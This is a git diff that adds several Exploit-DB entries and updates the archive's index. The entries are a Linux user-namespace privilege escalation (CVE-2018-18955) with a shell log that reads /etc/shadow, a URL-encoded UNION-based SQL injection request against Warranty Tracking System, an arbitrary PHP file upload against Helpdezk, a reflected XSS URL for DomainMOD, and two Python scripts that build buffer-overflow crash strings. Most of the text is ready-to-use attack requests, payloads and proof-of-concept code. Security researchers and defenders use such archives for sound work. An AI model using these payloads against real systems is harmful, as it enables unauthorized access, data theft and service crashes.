diff --git a/exploits/linux/local/45886.txt b/exploits/linux/local/45886.txt new file mode 100644 index 000000000..bd06dd810 --- /dev/null +++ b/exploits/linux/local/45886.txt @@ -0,0 +1,177 @@ +commit 6397fac4915a ("userns: bump idmap limits to 340") increases the number of +possible uid/gid mappings that a namespace can have from 5 to 340. This is +implemented by switching to a different data structure if the number of mappings +exceeds 5: Instead of linear search over an unsorted array of struct +uid_gid_extent, binary search over a sorted array of struct uid_gid_extent is +used. Because ID mappings are queried in both directions (kernel ID to +namespaced ID and namespaced ID to kernel ID), two copies of the array are +created, one per direction, and they are sorted differently. + +In map_write(), at first, during the loop that calls insert_extent(), the member +lower_first of each struct uid_gid_extent contains an ID in the parent +namespace. Later, map_id_range_down() is used in a loop to replace these IDs in +the parent namespace with kernel IDs. + +The problem is that, when the two sorted arrays are used, the new code omits the +ID transformation for the kernel->namespaced mapping; only the +namespaced->kernel mapping is transformed appropriately. + +This means that if you first, from the init namespace, create a user namespace +NS1 with the following uid_map: + + 0 100000 1000 + +and then, from NS1, create a nested user namespace NS2 with the following +uid_map: + + 0 0 1 + 1 1 1 + 2 2 1 + 3 3 1 + 4 4 1 + 5 5 995 + +then make_kuid(NS2, ...) will work properly, but from_kuid(NS2) will be an +identity mapping for UIDs in the range 0..1000. + +Most users of from_kuid() are relatively boring, but kuid_has_mapping() is used +in inode_owner_or_capable() and privileged_wrt_inode_uidgid(); so you can abuse +this to gain the ability to override DAC security controls on files whose IDs +aren't mapped in your namespace. + + +To test this, I installed the "uidmap" package in a Ubuntu 18.04 VM with the +following /etc/subuid and /etc/subgid: + +user@ubuntu-18-04-vm:~$ cat /etc/subuid +user:100000:65536 +user2:165536:65536 +user3:231072:65536 +user@ubuntu-18-04-vm:~$ cat /etc/subgid +user:100000:65536 +user2:165536:65536 +user3:231072:65536 +user@ubuntu-18-04-vm:~$ + + +Then, as the user "user", I compiled the two attached helpers (subuid_shell.c +and subshell.c): + +user@ubuntu-18-04-vm:~/userns_4_15$ gcc -o subuid_shell subuid_shell.c +user@ubuntu-18-04-vm:~/userns_4_15$ gcc -o subshell subshell.c + +subuid_shell.c uses the newuidmap helper to set up a namespace that maps 1000 +UIDs starting at 100000 to the namespaced UID 0; subshell.c requires namespaced +CAP_SYS_ADMIN and creates a user namespace that maps UIDs 0-999, using six +extents. + +I used them as follows to read /etc/shadow: + +user@ubuntu-18-04-vm:~/userns_4_15$ id +uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare) +user@ubuntu-18-04-vm:~/userns_4_15$ ls -l /etc/shadow +-rw-r----- 1 root shadow 1519 Jul 4 16:11 /etc/shadow +user@ubuntu-18-04-vm:~/userns_4_15$ head -n1 /etc/shadow +head: cannot open '/etc/shadow' for reading: Permission denied +user@ubuntu-18-04-vm:~/userns_4_15$ ./subuid_shell +root@ubuntu-18-04-vm:~/userns_4_15# id +uid=0(root) gid=0(root) groups=0(root),65534(nogroup) +root@ubuntu-18-04-vm:~/userns_4_15# cat /proc/self/uid_map + 0 100000 1000 +root@ubuntu-18-04-vm:~/userns_4_15# ls -l /etc/shadow +-rw-r----- 1 nobody nogroup 1519 Jul 4 16:11 /etc/shadow +root@ubuntu-18-04-vm:~/userns_4_15# head -n1 /etc/shadow +head: cannot open '/etc/shadow' for reading: Permission denied +root@ubuntu-18-04-vm:~/userns_4_15# ./subshell +nobody@ubuntu-18-04-vm:~/userns_4_15$ id +uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare) +nobody@ubuntu-18-04-vm:~/userns_4_15$ cat /proc/self/uid_map + 0 0 1 + 1 1 1 + 2 2 1 + 3 3 1 + 4 4 1 + 5 5 995 +nobody@ubuntu-18-04-vm:~/userns_4_15$ ls -l /etc/shadow +-rw-r----- 1 root shadow 1519 Jul 4 16:11 /etc/shadow +nobody@ubuntu-18-04-vm:~/userns_4_15$ head -n1 /etc/shadow +root:!:17696:0:99999:7::: +nobody@ubuntu-18-04-vm:~/userns_4_15$ + + +Here is a suggested patch (copy attached to avoid whitespace issues); does this +look sensible? + +================== +From 20598025d5e80f26a0c4306ebeca14b31539bd97 Mon Sep 17 00:00:00 2001 +From: Jann Horn +Date: Mon, 5 Nov 2018 20:55:09 +0100 +Subject: [PATCH] userns: also map extents in the reverse map to kernel IDs + +The current logic first clones the extent array and sorts both copies, then +maps the lower IDs of the forward mapping into the lower namespace, but +doesn't map the lower IDs of the reverse mapping. + +This means that code in a nested user namespace with >5 extents will see +incorrect IDs. It also breaks some access checks, like +inode_owner_or_capable() and privileged_wrt_inode_uidgid(), so a process +can incorrectly appear to be capable relative to an inode. + +To fix it, we have to make sure that the "lower_first" members of extents +in both arrays are translated; and we have to make sure that the reverse +map is sorted *after* the translation (since otherwise the translation can +break the sorting). + +This is CVE-2018-18955. + +Fixes: 6397fac4915a ("userns: bump idmap limits to 340") +Cc: stable@vger.kernel.org +Signed-off-by: Jann Horn +--- + kernel/user_namespace.c | 12 ++++++++---- + 1 file changed, 8 insertions(+), 4 deletions(-) + +diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c +index e5222b5fb4fe..923414a246e9 100644 +--- a/kernel/user_namespace.c ++++ b/kernel/user_namespace.c +@@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf, + if (!new_idmap_permitted(file, ns, cap_setid, &new_map)) + goto out; + +- ret = sort_idmaps(&new_map); +- if (ret < 0) +- goto out; +- + ret = -EPERM; + /* Map the lower ids from the parent user namespace to the + * kernel global id space. +@@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf, + e->lower_first = lower_first; + } + ++ /* ++ * If we want to use binary search for lookup, this clones the extent ++ * array and sorts both copies. ++ */ ++ ret = sort_idmaps(&new_map); ++ if (ret < 0) ++ goto out; ++ + /* Install the map */ + if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) { + memcpy(map->extent, new_map.extent, +-- +2.19.1.930.g4563a0d9d0-goog +================== + + +(By the way: map_id_up_max() is probably pretty inefficient, especially when +retpoline mitigations are on, because it uses bsearch(), which is basically a +little bit of logic glue around indirect function calls. If you care about +speed, you might want to add an inline variant of bsearch() for places like +this.) + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip \ No newline at end of file diff --git a/exploits/php/webapps/45881.txt b/exploits/php/webapps/45881.txt new file mode 100644 index 000000000..b86090e42 --- /dev/null +++ b/exploits/php/webapps/45881.txt @@ -0,0 +1,109 @@ +# Exploit Title: Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection +# Dork: N/A +# Date: 2018-11-14 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://warrantytrack.org/ +# Software Link: https://kent.dl.sourceforge.net/project/warrantytrack/warrantytrack%20Rel.11.06.3.zip +# Version: 11.06.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# //[PATH]//Customer//SearchCustomer.php +# .... +#83 $strSQL = "SELECT * FROM tblCustomers WHERE 1=1 "; +#84 if ( strlen($_POST["txtCustomerCode"])>0 ) +#85 $strSQL .= " And cCuctomerID Like '%" . $_POST["txtCustomerCode"] . "%'"; +#86 +#87 if ( strlen($_POST["txtCustomerName"])>0 ) +#88 $strSQL .= " And cName Like '%" . $_POST["txtCustomerName"] . "%'"; +#89 +#90 if ( strlen($_POST["txtPhone"])>0 ) +#91 $strSQL .= " And cPhone Like '%" . $_POST["txtPhone"] . "%'"; +#92 +#93 $Result = mysql_query($strSQL); +#94 +#95 while($Field_Customer = mysql_fetch_array($Result)) +#96 { +# .... + +# POC: +# 1) +# http://localhost/[PATH]/SearchCustomer.php?pDivAlert=NoCustomer +# +POST /PATH/customer/SearchCustomer.php?pDivAlert=NoCustomer HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=909k34togduf8v49mibgj6cpp5 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 244 +txtCustomerCode=%27%20%55%6e%69%4f%6e%20%53%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 06:03:04 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 4245 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/SearchCustomer.php?pDivAlert=NoCustomer +# +POST /PATH/customer/SearchCustomer.php?pDivAlert=NoCustomer HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=909k34togduf8v49mibgj6cpp5 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 244 +txtCustomerName=%27%20%55%6e%69%4f%6e%20%53%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 06:05:13 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 4245 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/SearchCustomer.php?pDivAlert=NoCustomer +# +POST /PATH/customer/SearchCustomer.php?pDivAlert=NoCustomer HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=909k34togduf8v49mibgj6cpp5 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 237 +txtPhone=%27%20%55%6e%69%4f%6e%20%53%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 06:06:25 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 4252 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45882.txt b/exploits/php/webapps/45882.txt new file mode 100644 index 000000000..69de06c08 --- /dev/null +++ b/exploits/php/webapps/45882.txt @@ -0,0 +1,93 @@ +# Exploit Title: Helpdezk 1.1.1 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-11-13 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.helpdezk.org/ +# Software Link: https://netcologne.dl.sourceforge.net/project/helpdezk/helpdezk-1.1.1.zip +# Version: 1.1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/helpdezk/manageattachments/ +# + +# Vulnerability found in more than one file. +##Log S1## +//PATH//app//modules//admin//views//upload.php +//PATH//app//modules//admin//views//upload2.php +//PATH//app//modules//admin//views//upload3.php +//PATH//app//modules//admin//views//upload_dsh_image.php +//PATH//app//modules//admin//views//upload_file.php +//PATH//app//modules//admin//views//upload_icon.php +//PATH//app//modules//helpdezk//views//manage_attachments.php +//PATH//app//modules//helpdezk//views//manage_icons.php +//PATH//app//modules//helpdezk//views//upload_file_knowledgebase.php + +POST /[PATH]/helpdezk/manageattachments/ HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------1293691802011755498543585049 +Content-Length: 374 +-----------------------------1293691802011755498543585049 +Content-Disposition: form-data; name="file"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------1293691802011755498543585049 +Content-Disposition: form-data; name="Submit" +Ver Ayari +-----------------------------1293691802011755498543585049-- +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 19:10:01 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=0qlddpbl1nbpmcaegppm73brg1; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 2771 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# +GET /[PATH]/app/uploads/helpdezk/attachments/4.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=0qlddpbl1nbpmcaegppm73brg1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 19:10:29 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/helpdezk/manageattachments/ +# +# http://localhost/[PATH]/app/uploads/helpdezk/attachments/[NUMBER].php +# + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45883.txt b/exploits/php/webapps/45883.txt new file mode 100644 index 000000000..b299d3ce3 --- /dev/null +++ b/exploits/php/webapps/45883.txt @@ -0,0 +1,15 @@ +# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting +# Date: 2018-11-09 +# Exploit Author: Dawood Ansar +# Vendor Homepage: domainmod (https://domainmod.org/) +# Software Link: domainmod (https://github.com/domainmod/domainmod) +# Version: v4.09.03 to v4.11.01 +# CVE : CVE-2018-19136 + +# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application +# versions from v4.09.03 to v4.11.01(https://github.com/domainmod/domainmod/issues/79) +# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php +# page and inject a javascript XSS payload in raid parameter + +# POC: +http://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&del=1 \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45884.py b/exploits/windows_x86-64/dos/45884.py new file mode 100755 index 000000000..84074c9bc --- /dev/null +++ b/exploits/windows_x86-64/dos/45884.py @@ -0,0 +1,42 @@ +# Exploit Title: Mumsoft Easy Software 2.0 - Denial of Service (PoC) +# Dork: N/A +# Date: 2018-11-15 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.munsoft.com/EasyRARRecovery/ +# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyRARRecovery/download/EasyRARRecovery-2.0-Setup.exe +# Other Affected software: +# Easy Archive Recovery 2.0 +# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyArchiveRecovery/download/EasyArchiveRecovery-2.0-Setup.exe +# Easy ZIP Recovery 2.0 +# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyZIPRecovery/download/EasyZIPRecovery-2.0-Setup.exe +# Easy Access Recovery 2.0 +# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyAccessRecovery/download/EasyAccessRecovery-2.0-Setup.exe +# Easy PowerPoint Recovery 2.0 +# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyPowerPointRecovery/download/EasyPowerPointRecovery-2.0-Setup.exe +# Easy Excel Recovery 2.0 +# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyExcelRecovery/download/EasyExcelRecovery-2.0-Setup.exe +# Easy Word Recovery 2.0 +# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyWordRecovery/download/EasyWordRecovery-2.0-Setup.exe + +# Version: 2.0 +# Category: Dos +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Help / Enter a registration key... + +#!/usr/bin/python + +buffer = "A" * 256 + +payload = buffer +try: + f=open("exp.txt","w") + print "[+] Creating %s bytes evil payload." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created." \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45885.txt b/exploits/windows_x86-64/dos/45885.txt new file mode 100644 index 000000000..97bb8a0b5 --- /dev/null +++ b/exploits/windows_x86-64/dos/45885.txt @@ -0,0 +1,46 @@ +# Exploit Title: Easy Outlook Express Recovery 2.0 - Denial of Service (PoC) +# Dork: N/A +# Date: 2018-11-15 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.munsoft.com/EasyOutlookExpressRecovery/ +# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyOutlookExpressRecovery/download/EasyOutlookExpressRecovery-2.0-Setup.exe +# Version: 2.0 +# Other Affectted Software: +# Easy Outlook Recovery 2.0 +# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyOutlookRecovery/download/EasyOutlookRecovery-2.0-Setup.exe +# Easy Mail Recovery 2.0 +# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyMailRecovery/download/EasyMailRecovery-2.0-Setup.exe +# Easy Office Recovery 2.0 +# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyOfficeRecovery/download/EasyOfficeRecovery-2.0-Setup.exe +# Easy File Undelete 3.0 +# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyFileUndelete/download/EasyFileUndelete-3.0-Setup.exe +# Easy NTFS Data Recovery 3.0 +# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyNTFSDataRecovery/download/EasyNTFSDataRecovery-3.0-Setup.exe +# Easy FAT Data Recovery 3.0 +# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyFATDataRecovery/download/EasyFATDataRecovery-3.0-Setup.exe +# Easy Drive Data Recovery 3.0 +# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyDriveDataRecovery/download/EasyDriveDataRecovery-3.0-Setup.exe +# Easy Digital Photo Recovery 3.0 +# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyDigitalPhotoRecovery/download/EasyDigitalPhotoRecovery-3.0-Setup.exe + +# Category: Dos +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Help / Enter a registration key... + +#!/usr/bin/python + +buffer = "A" * 260 + +payload = buffer +try: + f=open("exp.txt","w") + print "[+] Creating %s bytes evil payload." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created." \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b64d34edb..4d380e63b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6191,6 +6191,8 @@ id,file,description,date,author,type,platform,port 45850,exploits/windows_x86-64/dos/45850.py,"AMPPS 2.7 - Denial of Service (PoC)",2018-11-14,"Ihsan Sencan",dos,windows_x86-64, 45859,exploits/windows/dos/45859.py,"Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)",2018-11-14,Daniel,dos,windows, 45869,exploits/windows_x86-64/dos/45869.py,"Notepad3 1.0.2.350 - Denial of Service (PoC)",2018-11-15,"Ihsan Sencan",dos,windows_x86-64, +45884,exploits/windows_x86-64/dos/45884.py,"Mumsoft Easy Software 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64, +45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10107,6 +10109,7 @@ id,file,description,date,author,type,platform,port 45865,exploits/linux/local/45865.php,"PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass",2018-11-14,"Anton Lopanitsyn",local,linux, 45866,exploits/multiple/local/45866.html,"Webkit (Safari) - Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple, 45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple, +45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40382,4 +40385,7 @@ id,file,description,date,author,type,platform,port 45877,exploits/php/webapps/45877.txt,"Simple E-Document 1.31 - 'username' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php, 45878,exploits/php/webapps/45878.txt,"2-Plan Team 1.0.4 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php, 45879,exploits/php/webapps/45879.txt,"PHP Mass Mail 1.0 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php, -45880,exploits/php/webapps/45880.txt,"Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php, +45880,exploits/php/webapps/45880.txt,"WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php, +45881,exploits/php/webapps/45881.txt,"Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection",2018-11-16,"Ihsan Sencan",webapps,php, +45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php, +45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,